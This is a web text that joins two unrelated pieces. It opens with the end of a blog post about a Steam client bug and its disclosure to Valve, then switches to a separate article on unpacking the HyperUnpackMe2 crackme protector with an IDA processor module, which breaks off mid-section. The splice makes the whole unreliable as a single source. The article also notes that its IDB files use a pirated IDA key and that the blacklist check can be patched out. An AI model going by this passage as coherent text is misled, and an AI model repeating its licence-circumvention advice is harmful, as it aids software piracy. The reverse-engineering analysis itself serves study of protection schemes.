If you’ve made it to this section of the blog, thank you for sticking with it! I hope it is clear that this was a very simple bug, made relatively straightforward to exploit due to a lack of modern exploit protections. The vulnerable code was probably very old, but as it was otherwise in good working order, the developers likely saw no reason to go near it or update their build scripts. The lesson here is that as a developer it is important to periodically include aging code and build systems in your reviews to ensure they conform to modern security standards, even if the actual functionality of the code has remained unchanged. The fact that such a simple bug with such serious consequences has existed in such a popular software platform for so many years may be surprising to find in 2018 and should serve as encouragement to all vulnerability researchers to find and report more of them!

As a final note, it is worth commenting on the responsible disclosure process. This bug was disclosed to Valve in an email to their security team (security@valvesoftware.com) at around 4pm GMT and just 8 hours later a fix had been produced and pushed to the beta branch of the Steam client. As a result, Valve now hold the top spot in the (imaginary) Context fastest-to-fix leaderboard, a welcome change from the often lengthy back-and-forth process often encountered when disclosing to other vendors.

A page detailing all updates to the Steam client can be found at https://store.steampowered.com/news/38412/

Defeating HyperUnpackMe2 With an IDA Processor Module

1.0 Introduction

This article is about breaking modern executable protectors. The target, a crackme known as HyperUnpackMe2, is modern in the sense that it does not follow the standard packer model of yesteryear wherein the contents of the executable in memory, minus the import information, are eventually restored to their original forms.

Modern protectors mutilate the original code section, use virtual machines operating upon polymorphic bytecode languages to slow reverse engineering, and take active measures to frustrate attempts to dump the process. Meanwhile, the complexity of the import protections and the amount of anti-debugging measures has steadily increased.

This article dissects such a protector and offers a static unpacker through the use of an IDA processor module and a custom plugin. The commented IDB files and the processor module source code are included. In addition, an appendix covers IDA processor module construction. In short, this article is an exercise in overkill.

NOTE: all code snippets beginning with «ROM:» come from the disassembled VM code; all other snippets come from the protected binary.

HyperUnpackMe2 is provided as an ancillary to this article and includes:

  • codeseg—lightly—commented.idb: IDB of Virtual Machine (VM)
  • dumped.exe: Statically unpacked executable
  • Notepad.idb: IDB of packed executable
  • processor_module_source.zip: Source code for IDA processor module
  • th.w32: IDA processor module

The processor module (th.w32) belongs in %IDADIR%\procs. It requires IDA 5.0, as do both of the IDBs. Although I own IDA 5.0, these IDBs are linked with the pirated 5.0 key. This is due to the fact that IDB files contain the majority of your personal keyfile. Hence, the IDBs will stop working under 5.1, unless you patch out the blacklist code (which is trivial). If you are a legitimate customer of IDA and would like IDBs for a later version, contact me under the information at the bottom of the article.

 1.1 Modern Protectors

Protectors of generations past mainly compress/encrypt the original contents of the executable’s sections; redirect the entrypoint to a new section that contains the decompression/decryption stub mixed in with anti-disassembly and anti-debugging techniques; strip the import information at protect-time and rebuild the import address tables at runtime; and finally transfer control back to the original entrypoint. In other words, while the sections’ contents are modified on disk, they are mostly (with the exception of the import information) restored to their original state before execution is transferred back to the original program. Although there are some protectors which are exceptions, this is the basic idiom.

To unpack such protectors, execution is traced back to the original entrypoint, the process is dumped to create a new executable, and the import information is rebuilt. ImpRec and a sufficiently patched debugger are all that is needed to unpack protectors of this variety.

Rather than having an unmolested image in memory, new protectors are applying transformations to the original code in an effort to thwart understanding it and to make dumping the executable more difficult. Examples include converting portions of the code into proprietary byte-code formats which are executed by an embedded interpreter (so-called virtualization, virtual machines or VMs) and copying portions of the code elsewhere in the process’ address space (so-called stolen bytes, stolen functions). These techniques are now mainstream in all areas of software protection, from crackmes and commercial packers to industrial-grade protections.

 1.2 Transformations Applied by HyperUnpackMe2 to the Original Code

HyperUnpackMe2 extensively modifies the original code, and the entirety of the packer code is executed in a virtual machine. The anti-debugging is heavy and some of it is novel.

By quickly examining the code at the beginning of the binary, we notice the following:

  • Direct inter-module API calls are replaced with int 3 / 5x NOP. It is not known a priori whether these are fixed up directly, or whether they actually require a trip through a SEH. This could be problematic: think about Armadillo. Thunks to APIs are similarly obfuscated. The relevant data in the original IIDs and IATs have been zeroed.
  • Instructions which reference imports without calling them directly, i.e.
        .text:01004462  mov     esi, ds:__imp__lstrcpyW@8 ; lstrcpyW(x,x)
    

    have been replaced with zeroes. However, the surrounding context remains the same:

        TheHyper:0103A44D    push    ebx
        TheHyper:0103A44E    mov     ebx, [esp+8]
        TheHyper:0103A452    push    esi
        TheHyper:0103A453    db 0,0,0,0,0,0
        TheHyper:0103A459    push    edi
        TheHyper:0103A45A    push    _szAnsiText
        TheHyper:0103A460    push    ebx
        TheHyper:0103A461    call    esi
    

    So clearly, the missing instructions must be re-inserted (in some form) into the code before it’ll execute properly. Perhaps this happens via a trip through the virtualizer, perhaps they’re patched directly, perhaps a SEH-triggering event is patched in. Without further analysis, we have no way of knowing.

  • Intra-module calls are replaced with call $+5. It seems likely that these references are directly fixed up prior to execution; this turns out not to be the case (the ‘directly’ part is false).
  • Long jump instructions have had their targets replaced with a zero dword.
        .text:010023CE E9 00 00 00 00    jmp     $+5
    

    Again, it’s unknown what sort of obfuscation is being applied here.

  • Functions have been stolen, with zeroes left behind in place of the original code. These functions have been deposited towards the end of the packer section.
        .text:01001C5B                   ; __stdcall SetTitle(x)
        .text:01001C5B 00                _SetTitle@4     db    0
        .text:01001C5C 00                                db    0
        .text:01001C5D 00                                db    0
        .text:01001C5E 00                                db    0
    

 

 2.0 Virtual Machines

Although VM assembly languages are often simple, VMs pose a challenge because they severely dilute the value of existing tools. Standard dynamic analysis with a debugger is possible, but very tedious because of the low ratio of signal to noise: one traces the same VM parsing / dispatching code over and over again. Static analysis is broken because each different VM has a different instruction encoding format (and this can be polymorphic). Patching the VM program requires a familiarity with the instruction set that must be gained through analysis of the VM parser. Basically, reverse engineering a VM with the common tools is like reverse engineering a scripted installer without a script decompiler: it’s repetitious, and the high-level details are obscured by the flood of low-level details.

 2.1 General Setup of VM Protections

The virtual machine needs an environment to execute in. This is generally implemented as a structure, hereinafter «the VM context structure». Each VM is different, but of the ones I’ve encountered thus far, each is based on the concept of a register architecture, and so the VM context structures typically consist of registers, flags, and various pointers (e.g. stack, maybe a heap of some sort, or a static data section).

Before the first instruction is executed, the VM context structure is allocated, and the registers and pointers are initialized, which usually involves allocating memory (perhaps on the host stack) for the VM stack.

After initialization, the archetypal VM enters into a loop which:

  • Decodes instructions at VM_context.EIP,
  • Performs the commands specified by the instruction, and then
  • Calculates the next EIP.

The process of execution usually involves examining the first byte of the instruction and determining which function/switch statement case to execute.

Eventually, the VM reaches some stop condition, and either exits or transfers control back to the native processor.

 3.0 Description of HyperUnpackMe2’s VM Harness

The HyperUnpackMe2 VM context structure contains sixteen dword registers, including ESP, which can each be accessed as a little-endian byte, word, or dword. There is an EIP register and an EFLAGS register as well. There is a pointer to the VM data (which is where EIP begins), and its length. The structure is zeroed upon creation. Its declaration follows. See the included x86 IDB for all of the gory details.

    struct TH_registers
    {
        unsigned long rESP;    unsigned long r1;    unsigned long r2;
        unsigned long r3;      unsigned long r4;    unsigned long r5;
        unsigned long r6;      unsigned long r7;    unsigned long r8;
        unsigned long r9;      unsigned long rA;    unsigned long rB;
        unsigned long rC;      unsigned long rD;    unsigned long rE;
        unsigned long rF;
    };
    
    struct TH_context
    {
        unsigned char *vm_data;
        unsigned long vm_data_len;
        unsigned char *EIP;
        unsigned long EFLAGS;
        TH_registers registers;
        TH_keyed_mem keyed_mem_array[502];
        unsigned long stack[0x9000/4];
    };

 

 3.1 Instruction Encoding

The HyperUnpackMe2 VM consists of 36 instructions, split up into five groups. Each group has a different instruction encoding format, with a few commonalities. The commands understood by the VM are the following (non-obvious ones will be explained in detail in subsequent sections):

  • Group One: Two-operand arithmetic instructions:
    • mov, add, sub, xor, and, or, imul, idiv, imod, ror, rol, shr, shl, cmp
  • Group Two: One-operand arithmetic and general instructions:
    • push, pop, inc, dec, not
  • Group Three: One-operand control flow instructions:
    • jmp, jz, jnz, jge, jg, jle, jl, vmcall, x86call
  • Group Four: Memory-related instructions:
    • valloc, vfree, halloc, hfree
  • Group Five: Miscellaneous instructions:
    • getefl, getmem, geteip, getesp, retd, stop

The VM itself is heavily based on the x86 architecture, as evident from the following snippets:

    TheHyper:0104A159 VM_set_flags_dword:
    TheHyper:0104A159                 cmp     [edi], esi
    TheHyper:0104A15B                 pushf
    TheHyper:0104A15C                 pop     [eax+VM_context_structure.EFLAGS]
    
    TheHyper:0104A316 VM_jz:
    TheHyper:0104A316                 push    [eax+VM_context_structure.EFLAGS]
    TheHyper:0104A319                 popf
    TheHyper:0104A31A                 jnz     short loc_104A31F
    TheHyper:0104A31C                 mov     [eax+VM_context_structure.EIP], edi
    TheHyper:0104A31F loc_104A31F:
    TheHyper:0104A31F                 jmp     short VM_dispatcher_13h_locret

The VM is using the host processor’s flags in a very literal fashion. Group one and two, and to some extent group three, instructions are implemented very thinly on top of existing x86 instructions, reflecting the fundamental similarity of this virtual processor to it.

 3.2 X86 <-> VM Crossover

The x86call instruction, depicted below, switches the host ESP with the VM ESP, and transfers control to the x86 code pointed to by EDI (what EDI is depends on the specifics of the instruction’s encoding). The result of the function call is placed in virtual register #A. We’ll find out later that this functionality is only ever used to call small functions associated with the protector, so we don’t have to worry about alternative calling conventions and the clobbering of EDX and EBP by the function.

The switching of the host ESP with the VM ESP signifies that parameters to x86 functions are pushed onto the VM stack in the same order and manner as they would be if the calls were being made natively.

    TheHyper:0104A36A    mov     esi, esp
    TheHyper:0104A36C    mov     edx, [eax+VM_context_structure.VM_registers.rESP]
    TheHyper:0104A36F    mov     esp, edx
    TheHyper:0104A371    call    edi
    TheHyper:0104A373    mov     edx, [ebp+arg_0]
    TheHyper:0104A376    mov     [edx+VM_context_structure.VM_registers.rA], eax
    TheHyper:0104A379    mov     esp, esi

The stop instruction in group five, depicted below, is suspicious and looks like it’s used to transfer control back to OEIP. EBP, the frame pointer, points to the saved frame pointer coming into the function, which is the first thing pushed after the return address of the caller. Therefore, [ebp+4] is the return address.

    TheHyper:0104A69F    cmp     cl, 0FFh
    TheHyper:0104A6A2    jnz     short go_on_parsing
    TheHyper:0104A6A4    popa
    TheHyper:0104A6A5    mov     eax, [ebp+var_4_VM_context_structure]
    TheHyper:0104A6A8    mov     eax, [eax+VM_context_structure.VM_registers.rA]
    TheHyper:0104A6AB    mov     [ebp+4], eax    ; [ebp+4] = return address
    TheHyper:0104A6AE    leave
    TheHyper:0104A6AF    retn    8

We thus expect that the packer will return to OEIP by using the stop instruction, with OEIP in virtual register #A.

 3.3 Memory Keying

The virtual machine also maintains an associative array of memory locations. Each block of memory that it tracks has a keying tag associated with it. There are native functions to add memory pointers with keys, retrieve a pointer by passing in its associated key, remove a pointer given its key, and update a pointer given a key and a new block of memory to point to. Not all of these functions are accessible through the instruction set; they seem to be for debugging purposes.

Some of the memory blocks contain non-obfuscated x86 code, some obfuscated, some contain VM code, and some contain data.

The internal data structure for a keyed memory entry looks like the following:

    struct TH_keyed_mem
    {
        unsigned char *ptr;
        unsigned long key;
    };

Analyzing the functions which manipulate this structure can be slightly confusing due to negative structure displacements:

    TheHyper:0104A3DC    mov     [esi], edx           ; key
    TheHyper:0104A3DE    mov     [esi-4], eax         ; ptr
    TheHyper:0104A3E1    add     dword ptr [esi-4], 8 ; ptr

3.3.1 Initializing the Associative Array

During initialization, the VM calls a function which scans the VM’s data looking for all occurrences of the dword ‘$$$$’. For each instance found, it treats the next dword as the key, and takes the address of the dword following that as the pointer.

    ['$$$$'][4-byte key]^[arbitrary data]  ^:  pointer

3.3.2 Using the Associative Array

In the instruction set, group four specifically, there are two pairs of instructions which add and remove memory blocks from the internal associative array. The first pair allocates memory with VirtualAlloc, and the second pair uses HeapAlloc. There is no protection in the VM against attempting to de-allocate a block which wasn’t allocated in the first place.

Group five contains an instruction, getmem, to fetch a memory block given a key. Group three, the control-flow transfer instructions, can take memory keys as arguments. In other words, jmp/jcc key will transfer control into the memory region pointed at by the key. In fact, the first instruction executed by the VM is of the form jmp key, and this is the primary form of control-flow transfer in the VM.

 4.0 Static Analysis of HyperUnpackMe2’s VM Code

Based on the analysis of the VM dispatching harness, I constructed an IDA processor module to examine the code inside of the VM — dead and natively. As such, the anti-debugging tricks are generally beyond the scope of this article, but a brief discussion can be found in appendix A. See appendix B for information about writing IDA processor modules.

Beyond the anti-debugging, there’s a lot of anti-dump protection in this packer. The main «tricks» all involve the redirection of certain aspects of normal code execution.

  • The stolen functions are copied into VirtualAlloc’ed memory.
  • The API calls and API-referencing instructions point to obfuscated stubs which eventually redirect to their intended targets, which are actually in copies of the referenced DLLs, not the originals. There are 73 kilobytes’ worth of obfuscated stubs in the packer section.
  • Relative jumps and calls travel through tiny stub functions in VirtualAlloc’ed memory onto their destinations.

Further, all API references are changed to relatively-addressed varieties instead of direct references, i.e. 0xE8 [displacement to import] (call import_address) instead of 0xFF 0x15 [IAT entry] (call dword ptr [IAT entry]).

The point is to make dumping as hard as possible by creating a rigid reliance on the exact layout of the process’ address space as it exists during that particular invocation (including the VirtualAlloc’ed memory regions and copied DLLs), and by removing any trace of the import table.

The following sections fill in the gaps (no pun intended) left in section 1.2 by describing precisely what happens under the covers of the VM. In the course of examination, we find that the fixups for each type take place in clusters, with similar code being used repeatedly to perform the same type of fixup. This turns out to be all of the information needed to break the protection, resulting in an automatic, static unpacker for any binary packed with it (of which there are no more — TheHyper informed me that the protector was lost due to a disk crash).

 4.1 Stolen Functions

The first thing we’ll need to deal with are the missing functions. As we can see in the following snippet, it turns out that the functions are copied into allocated memory, and a long jump into the relevant function in allocated memory is inserted at the site of the function in the original code section. It should be noted that the stolen functions are still subject to the modifications described in subsequent sections.

    .text:01001B9A    ; __stdcall UpdateStatusBar(x)
    .text:01001B9A    _UpdateStatusBar@4 db 0B7h dup(0)
    
    ROM:0103AFAA    mov     r0B, 1038A82h ; location of function in the VM section
    ROM:0103AFB2    mov     r06, 0B7h     ; notice this matches up with the
    ROM:0103AFBA    push    r06           ; size of the stolen function above
    ROM:0103AFBD    push    r0B
    ROM:0103AFC0    push    r0F           ; points to a block of allocated mem
    ROM:0103AFC3    x86call x86_memcpy
    ROM:0103AFC9    add     rESP, 0Ch
    ROM:0103AFD1    mov     r0B, 1001B9Ah ; address of UpdateStatusBar
    ROM:0103AFD9    mov     r0E, r0F
    ROM:0103AFDD    sub     r0E, r0B
    ROM:0103AFE1    sub     r0E, 5        ; r0E is the displacement of the jmp
    ROM:0103AFE9    add     r0F, r06      ; point after the copied function
    ROM:0103AFED    mov     [r0Bb], 0E9h  ; assemble a long jmp
    ROM:0103AFF2    inc     r0B
    ROM:0103AFF5    mov     [r0B], r0E    ; write the displacement for the jmp

Locating these copies is easy enough: references to x86_memcpy following the final memory key are the ones which copy the stolen functions into VirtualAlloc’ed memory. We can easily extract the source of the copy and the destination of the write and copy the function back into its original real estate within the binary.

While we’re on the subject, when fixups are made to functions which have been copied into allocated memory, they are made as a displacement against the beginning of that memory. I.e. we might see a fixup of a long jump made against address [displacement + 100h]. Thus, in order to know where in the original binary this long jump is, we need to retain information about where the functions in the original binary are situated in the allocated memory.

For example:

    Displacement   0h into allocated memory -> 1001B9Ah
    Displacement  B7h into allocated memory -> 1001EEFh
    Displacement 11Dh into allocated memory -> 100696Ah

Then, when we see one of these arbitrary displacements, we can map it to a location in the original binary by looking for the greatest lower bound in the set of displacements. I.e. for displacement C0h, this is +9h into the function with displacement B7h, and is therefore at the address 1001EEFh + 9h. Here’s an example:

    ROM:01049920    getmem  r0B, 10000h
    ROM:01049926    mov     r0B, [r0B]
    ROM:0104992A    add     r0B, 639h    ; where does this point?

 

 4.2 Long Jump Obfuscation

 

    .text:010019DF E9 00 00 00 00                    jmp     $+5

Here we see, in the x86 IDB, an example of the jmp obfuscation. What actually happens here, at runtime, is that a chunk of memory is allocated, and gets filled with what looks like API thunk functions. The jmps in the binary are patched to jmp into the allocated memory, which subsequently jmps to the correct location in the binary. The following VM code illustrates this:

    ROM:0104840F    valloc  195h, 6       ; allocate 0x195 bytes of vmem under the
    ROM:01048418    getmem  r0E, 6        ; tag 0x6
                    
    ROM:0104841E    mov     r0F, 10019DFh ; see above:  same address
    ROM:01048426    mov     r0D, r0F
    ROM:0104842A    add     r0D, 5        ; point after the jump
    ROM:01048432    mov     r09, r0E      ; point at the currently-assembling stub
    ROM:01048436    sub     r09, r0D      ; calculate the displacement for the jmp
    ROM:0104843A    inc     r0F           ; point to the 0 dword in e9 00000000
    ROM:0104843D    mov     [r0F], r09    ; insert reference to allocated memory
    ROM:01048441    mov     r0B, 1001AE1h ; this is the target of the jmp
    ROM:01048449    mov     r0C, r0E
    ROM:0104844D    add     r0C, 5        ; calculate address after allocated jmp
    ROM:01048455    sub     r0B, r0C      ; calculate displacement for jmp
    ROM:01048459    mov     [r0Eb], 0E9h  ; build jmp in VirtualAlloc'ed memory
    ROM:0104845E    inc     r0E
    ROM:01048461    mov     [r0E], r0B    ; insert address into jmp
    ROM:01048465    add     r0E, 4

This is the general code sequence used to fix up the jumps when the function to be fixed up remains in the original binary’s sections. When the function has been copied into memory, as described in the previous section, the code changes slightly: r0F and r0B’s addresses are the displacements described previously. For example, the code at -41E and -441 are replaced with these snippets, respectively:

    ROM:010498F3    getmem  r0F, 10000h
    ROM:010498F9    mov     r0F, [r0F]
    ROM:010498FD    add     r0F, 469h
    
    ROM:01049920    getmem  r0B, 10000h
    ROM:01049926    mov     r0B, [r0B]
    ROM:0104992A    add     r0B, 639h

Given the sequences above, and making use of the stolen address -> real address mapping, it’s trivial to cut out the middleman and insert the proper displacements into the correct dword locations. In the code above, we retrieve the dword operands from -41E and -441 and simply fix the jumps ourselves.

 4.3 Calls-To Obfuscation

These are handled in a very similar fashion as the jump obfuscation: the code to fix up the calls-to references is exactly the same as the jump obfuscation fixups. The calls also go through stubs in allocated memory which jmp to their proper destinations.

    .text:01001C51 6A 00             push    0
    .text:01001C53 E8 00 00 00 00    call    $+5
    .text:01001C58 C2 1C 00          retn    1Ch
    
    ROM:0104419A    valloc  3F2h, 5       ; allocate 0x3f2 bytes of memory under
    ROM:010441A3    getmem  r0E, 5        ; the tag 0x5
    
    ROM:010441A9    mov     r0F, 1001C53h ; address of call to be fixed up (above)
    ROM:010441B1    mov     r0D, r0F
    ROM:010441B5    add     r0D, 5        ; point after the call
    ROM:010441BD    mov     r09, r0E      ; r09 points to the allocated jmp stub
    ROM:010441C1    sub     r09, r0D
    ROM:010441C5    inc     r0F
    ROM:010441C8    mov     [r0F], r09    ; insert the proper displacement
    ROM:010441CC    mov     r0B, 1001B9Ah ; we would be calling this address
    ROM:010441D4    mov     r0C, r0E
    ROM:010441D8    add     r0C, 5
    ROM:010441E0    sub     r0B, r0C      ; calculate displacement
    ROM:010441E4    mov     [r0Eb], 0E9h  ; form the long jmp in allocated memory
    ROM:010441E9    inc     r0E
    ROM:010441EC    mov     [r0E], r0B
    ROM:010441F0    add     r0E, 4

Notice that, in this case, a call from a non-stolen function is being fixed up to call a non-stolen function: the addresses on lines -1A9 and -1CC are hard-coded within the binary. When a call in a stolen function is fixed up to call another function, the beginning of the above code sequence is different: it uses the getmem idiom, as we saw previously. The code at -1A9 becomes:

    ROM:010441F8    getmem  r0F, 10000h
    ROM:010441FE    mov     r0F, [r0F]
    ROM:01044202    add     r0F, 20Dh

However, the destination address is not loaded via getmem, because as we saw previously, calls to stolen functions are routed to their destinations via these jumps. I.e. calls to stolen functions behave just like calls to the original functions.

Recovering the proper displacement from the caller to the callee is as simple as it was for the jumps, because the code is identical, so see the closing remarks for the last section on how to fix up these calls.

 4.4 Import Obfuscation

Here’s a sample of the import redirection. Instead of referencing the imports directly, the jmp/call-to-import instructions are patched to reference locations such as these:

    TheHyper:01021524    pushf
    TheHyper:01021525    pusha
    TheHyper:01021526    call    sub_1021548
    
    TheHyper:01021548    pop     eax
    TheHyper:01021549    add     eax, 16h
    TheHyper:0102154C    jmp     eax

This sort of thing goes on for a while (six layers for this one) with some random junked garbage interspersed before eventually redirecting control to the original import:

    TheHyper:010215DE 61                popa
    TheHyper:010215DF 9D                popf
    TheHyper:010215E0 E9 00 00 00 00    jmp     $+5

4.4.1 IAT Reconstruction

Believe it or not, the first thing that HyperUnpackMe2 does when it really gets down to business is to correctly rebuild the original IAT.

First, the DLL names are retrieved from memory byte-by-byte. The names are not stored contiguously, but rather, the bytes corresponding to the DLL names are randomly mixed together. The DLL is then LoadLibraryA’d.

    ROM:01026058    mov     r04, 1013000h  ; point to beginning of packer section
    ROM:0102607B    getmem  r05, dword_101382D
    ROM:01026081    mov     r0B, r09
    ROM:01026085    mov     r06, r04
    ROM:01026089    add     r06, 41Ch
    ROM:01026091    mov     [r0Bb], [r06b] ; copy byte of DLL name from 0x101341c
    ROM:01026095    inc     r0B
    ROM:01026098    mov     r06, r04
    ROM:0102609C    add     r06, 93h
    ROM:010260A4    mov     [r0Bb], [r06b] ; copy byte of DLL name from 0x1013093
    
    ; idiom repeats a variable number of times
    
    ROM:010260A8    inc     r0B
    ROM:0102617C    mov     [r0Bb], 0
    ROM:01026181    push    r09
    ROM:01026184    x86call r0C                 ; LoadLibraryA
    ROM:01026186    add     rESP, 4

Next, the entire DLL’s address space is copied into a freshly-allocated chunk of memory. Yes, you read that right. The DLL’s SizeOfImage is used as the size parameter to VirtualAlloc, and then the entire DLL is memcpy’d into it the result. This is responsible for a huge bloat in the memory footprint. I didn’t think that this trick would work, but the crackme does run, after all. Personal correspondence with TheHyper reveals that this is why the crackme only runs on XP SP2 (although I haven’t investigated why — help me out here, Alex?).

The following code illustrates the process:

    ROM:0102618E    push    r09
    ROM:01026191    push    r0B
    ROM:01026194    push    r0D
    ROM:01026197    mov     r09, r0A
    ROM:0102619B    getmem  r0A, g_Copy_Of_Kernel32_Address_Space
    ROM:010261A1    mov     r0A, [r0A]
    ROM:010261A5    push    kernel32_hashes_VirtualAlloc
    ROM:010261AB    push    r0A
    ROM:010261AE    vmcall  API__GetProcAddress
    ROM:010261B4    mov     r0D, r0A
    ROM:010261B8    mov     r0B, r09
    ROM:010261BC    add     r0B, 3Ch
    ROM:010261C4    mov     r0B, [r0B]
    ROM:010261C8    add     r0B, r09
    ROM:010261CC    add     r0B, 50h
    ROM:010261D4    mov     r0B, [r0B]          ; retrieve this DLL's SizeOfImage
    ROM:010261D8    push    40h
    ROM:010261DE    push    1000h
    ROM:010261E4    push    r0B
    ROM:010261E7    push    0
    ROM:010261ED    x86call r0D                 ; allocate that much memory
    ROM:010261EF    add     rESP, 10h
    ROM:010261F7    mov     r03, r0A
    ROM:010261FB    mov     [r05], r0A
    ROM:010261FF    push    r0B
    ROM:01026202    push    r09
    ROM:01026205    push    r0A
    ROM:01026208    x86call x86_memcpy          ; copy DLL's address space
    ROM:0102620E    add     rESP, 0Ch
    ROM:01026216    pop     r0D
    ROM:01026219    pop     r0B
    ROM:0102621C    pop     r09

Next, the imported APIs are loaded, but not in the normal way. The protector includes a VM-function that I’ve called API__GetProcAddress, which takes a pseudo-HMODULE and a shellcode-like API hash as arguments. The pseudo-HMODULE is the address of the memory that the DLL was copied into above. Thus, the addresses returned by this function reside in the copied DLL bodies, and not the originals.

API__GetProcAddress works by iterating through the DLL’s exports and hashing each function’s name, stopping when it finds the corresponding hash that was passed in as an argument. It then returns the address of that function.

This makes it harder for dynamic tools to identify which APIs are actually being used: after all, the API addresses are not contained within a loaded module.

The hashes and their locations in the original IAT are retrieved from the jumble of data at the beginning of the packer section in a similar fashion as the assembling of the DLL names. Additionally, the address at which the resolved import belongs in the original IAT entries is also assembled from scattered data.

    ROM:0102621F    xor     r07, r07    ; r07 = hash
    ROM:01026223    mov     r06, r04
    ROM:01026227    add     r06, 12h
    ROM:0102622F    mov     r05, [r06]
    ROM:01026233    and     r05, 0FFh
    ROM:0102623B    or      r07, r05    ; get a single byte of the hash
    ROM:0102623F    ror     r07, 8
    
    ; idiom repeats three times
    
    ROM:010262B3    xor     r08, r08    ; r08 = where to put the resolved import
    ROM:010262B7    mov     r06, r04
    ROM:010262BB    add     r06, 5C7h
    ROM:010262C3    mov     r05, [r06]
    ROM:010262C7    and     r05, 0FFh
    ROM:010262CF    or      r08, r05
    ROM:010262D3    ror     r08, 8
    
    ; idiom repeats three times
    
    ROM:01026347    push    r07
    ROM:0102634A    push    r03         ; point at copied DLL
    ROM:0102634D    vmcall  API__GetProcAddress
    ROM:01026353    add     r08, 1000000h
    ROM:0102635B    mov     [r08], r0A  ; store resolved address back into IAT

The DLL names, hashes, and IAT addresses can all be recovered with no difficulties, and we can ignore the DLLs being copied into dynamically allocated memory. It’s a simple matter to reverse the hashes into API names. Therefore, the entirety of the import information can be reconstructed statically: we can simply mimic what the packer itself does, rebuild the IDTs/IATs with no difficulties, and then point the imports directory pointer in the PE header to our rebuilt structures.

I was anticipating things would be harder than they turned out to be, so I decided to move the FirstThunk lists (into which the original import references were made) instead of keeping them at their original addresses. This turned out to be an unnecessary mistake that complicates some of what follows. I apologize.

In order to rectify this situation, I kept a map from the old IAT addresses into the new IATs that I created.

For example:

    .text:010012A0    __imp__PageSetupDlgW@4 dd 0

    010012A0 -> [Address of new FirstThunk entry for PageSetupDlgW import]

4.4.2 IAT Redirection

The next thing that happens is that the addresses which were resolved in the previous section are inserted into API-obfuscating stubs described in 4.4, and the addresses of these API-obfuscating stub functions are inserted into the IAT atop the import addresses.

    .text:010012A0    ; BOOL __stdcall PageSetupDlgW(LPPAGESETUPDLGW)
    .text:010012A0    __imp__PageSetupDlgW@4 dd 0
    
    TheHyper:01014126    pushf              
    TheHyper:01014127    pusha              
    TheHyper:01014128    call    sub_1014150 ; eventually ends up at next snippet
                                                                           
    TheHyper:0101423A    popa                       
    TheHyper:0101423B    popf                       
    TheHyper:0101423C    jmp     near ptr 0B97002DDh ; patch here + 1 byte
    
    ROM:0103659A    mov     r0B, 10012A0h ; see above:  IAT addr
    ROM:010365A2    mov     r0E, 1014126h ; see above:  beginning of import obfs
    ROM:010365AA    mov     r08, 101423Dh ; see above:  end of import obfs
    ROM:010365B2    mov     r06, [r0B]
    ROM:010365B6    mov     [r0B], r0E    ; replace IAT addr with obfuscated addr
    ROM:010365BA    mov     r03, r08
    ROM:010365BE    dec     r03
    ROM:010365C1    add     r03, 5
    ROM:010365C9    sub     r06, r03
    ROM:010365CD    mov     [r08], r06    ; form relative jump to real import

This makes no difference to the static examiner, and does not require fixups.

4.4.3 Call Instruction Fixup

Next, the CALL instructions which reference the IAT are re-created as relatively-addressed instructions which reference the API-obfuscating stub functions. The instructions in the original binary were 0xFF 0x15 [direct address], the pre-fixup instructions are 0xCC 0x90 0x90 0x90 0x90 0x90, and the new instructions are 0xE8 [relative address] 0x90. As this operation requires one less byte than the original directly-addressed references, a NOP is needed for the remaining byte cavity.

    .text:010019D4    int     3    ; Trap to Debugger
    .text:010019D5    nop
    .text:010019D6    nop
    .text:010019D7    nop
    .text:010019D8    nop
    .text:010019D9    nop
    
    ROM:0103C747    mov     r03, 10019D4h ; address of the snippet above
    ROM:0103C74F    mov     r06, r03
    ROM:0103C753    add     r06, 5        ; point after call
    ROM:0103C75B    mov     [r03b], 0E8h  ; insert relative call
    ROM:0103C760    inc     r03
    ROM:0103C763    mov     r04, 100121Ch ; where we call to
    ROM:0103C76B    sub     r04, r06      ; create relative displacement
    ROM:0103C76F    mov     [r03], r04    ; insert relative address
    ROM:0103C773    add     r03, 4
    ROM:0103C77B    mov     [r03b], 90h   ; insert NOP in empty byte spot

As before, the idiom is slightly different for fixing the calls in stolen functions, in that r03 is fetched from memory instead of referenced directly. The code at -747 would become, for instance:

    ROM:0103C67E    getmem  r03, 10000h
    ROM:0103C684    mov     r03, [r03]
    ROM:0103C688    add     r03, 1318h

In order to fix these up, we retrieve the address of the call from -747, and the import destination from -763. We then manually insert the correct instruction which calls into this IAT slot. Actually, due to my previously-described mistake, we first run the IAT address through the old IAT slot -> new IAT slot map before fixing the instruction.

4.4.4 Mov Instruction Fixup

Next, instructions of the form mov reg32, [dword from IAT] are fixed up by the protector in the same fashion as in the previous section. They are relatively addressed to point directly to the obfuscated stubs (whose addresses are fetched out of the IAT), instead of the direct addressing that was present in the original binary. The registers involved in this process are ESI, EDI, EBP, EBX, and EAX.

Stop and think for a second. So far, we’ve made the assumption that all imports are functions, but this is not always true. The MSVC CRT contains references to two imported data items. Trying to run a data import through the import-obfuscating procedure is an incorrect transformation and will always result in a crash. This is an Achilles’ heel of this protection.

The mov-instruction fixup is accomplished in much the same way as the call-instruction fixups. There are several idioms: for stolen functions, for regular functions, for EAX versus the other registers (as the instruction for EAX is five bytes, while the others are six bytes). The EAX-references are assumed to point to data and are fixed up directly instead of relatively.

Once again, extracting this information from the code sequences is not difficult to do statically, and I think I’m starting to develop RSI so I’ll skip the details here.

4.4.5 IAT Zeroing

After all of the references are correctly fixed up, the import addresses in the IAT are no longer needed, and are zeroed. We can ignore this step.

 4.5 The Rest of the Protection

As is usual in unpacking tasks, we must set the original entrypoint field of the PE header to the real entrypoint. We scan the disassembly listing for the instruction ‘stop’ and then statically backtrace to find the value of r0A.

    ROM:01049F05    mov     r0A, 1006AE0h
    ROM:01049F0D    stop

Finally, the NumberOfRVAsAndSizes field of the PE header has been set to -1 in order to confuse OllyDbg, so we should set that back to 0x10, the default. And while we’re at it, reduce the raw and virtual sizes of the last section, reduce the SizeOfImage, and truncate the last section in the executable. The final executable is exactly 1kb larger than the copy of notepad.exe which ships with Windows XP SP2.

After making all of the above modifications, the binary runs properly. Success!

 5.0 Comments On The Protection

It took a lot of work to unpack this protector, but ultimately, the static solution was both obvious and straightforward. On the other hand, dynamic dumping of this protector would be difficult, although still feasible.

 5.1 Problems With The Protection

This protection has a few problems in the theoretical sense. For one, it requires disassembling the binary: considering that the IAT is zeroed, _every_ reference to the IAT must be accounted for; if not, the program will simply crash. For example, if a trivial packer which XORed the code section, but left the imports alone, was applied first, all references would be missed and the binary would have no hope of running. This could be assuaged by not zeroing the original IAT (but still applying fixups on those which can be found) so that any non-found references continue to work properly.

